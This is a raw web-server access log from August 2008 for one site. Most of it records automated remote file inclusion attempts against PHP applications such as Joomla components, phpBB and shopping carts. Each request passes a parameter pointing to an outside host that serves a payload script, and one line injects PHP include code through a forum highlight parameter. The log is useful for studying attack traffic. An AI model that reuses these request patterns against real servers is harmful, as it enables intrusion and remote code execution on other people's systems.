208.82.247.252 - - [10/Aug/2008:11:50:47 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:50 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:50 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:50 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:50 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:50:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:50:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:50:58 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:50:58 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:50:58 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:50:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:50:59 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:03 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:03 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:51:06 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:06 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:51:06 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:51:07 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:51:10 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:51:29 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:51:29 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:51:29 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.8.104 - - [10/Aug/2008:11:51:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
216.86.146.46 - - [10/Aug/2008:11:51:35 -0700] "GET /protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
216.86.146.46 - - [10/Aug/2008:11:51:35 -0700] "GET /logs/protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:51:39 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.134.22.225 - - [10/Aug/2008:11:51:43 -0700] "GET /logs/protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.134.22.225 - - [10/Aug/2008:11:51:43 -0700] "GET /protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:51:49 -0700] "GET /logs/access_080117.log%20//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.8.104 - - [10/Aug/2008:11:51:49 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=3 HTTP/1.0" 200 19715 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:11:51:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:51:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:52:10 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:52:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18625 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:52:29 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:52:29 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.191.194 - - [10/Aug/2008:11:52:38 -0700] "GET /protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.199.191.194 - - [10/Aug/2008:11:52:38 -0700] "GET /logs/protection.php?action=logout&siteurl=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:52:48 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:52:49 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:31 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:34 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:34 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:53:37 -0700] "GET /logs/access_080404.log/?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:53:39 -0700] "GET /?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18535 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:41 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:53:41 -0700] "GET /logs/?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 59997 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:44 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:53:44 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:54:26 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:54:30 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:54:40 -0700] "GET /logs/access_080309.log//errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:48 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:49 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:11:54:51 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:11:54:53 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:56 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:54:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:08 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:08 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:28 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:32 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:55:32 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
65.55.211.22 - - [10/Aug/2008:11:55:35 -0700] "GET /bikes/GPS/WeSTOC2006/?S=A HTTP/1.1" 200 849 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:11:56:15 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:56:26 -0700] "GET /logs/access_080224.log%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:56:36 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:56:38 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:11:56:38 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:57:28 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:57:28 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:57:29 -0700] "GET //errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:57:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:57:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:57:54 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:57:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:57:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:58:08 -0700] "GET /logs/access_080324.log/?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:11:58:20 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:58:31 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:58:32 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:58:32 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:58:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:58:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:58:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:58:59 -0700] "GET /logs/access_080209.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:59:00 -0700] "GET //index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:59:01 -0700] "GET /logs//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:59:03 -0700] "GET /logs/access_080209.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:59:07 -0700] "GET //index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.813" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:59:08 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:11:59:08 -0700] "GET /logs//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:59:36 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:01:05 -0700] "GET /logs/access_080222.log/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:01:05 -0700] "GET /php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:01:05 -0700] "GET /logs/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:02:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18625 "-" "libwww-perl/5.65" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:02:39 -0700] "GET /errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:02:39 -0700] "GET /logs/errors.php?error=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:12:02:42 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.thegoodfoot.com/logs/dorid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.80.190.246 - - [10/Aug/2008:12:02:47 -0700] "GET /logs/access_080118.log/index.php?url=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.190.246 - - [10/Aug/2008:12:02:50 -0700] "GET /index.php?url=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 18397 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.190.246 - - [10/Aug/2008:12:02:51 -0700] "GET /logs/index.php?url=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
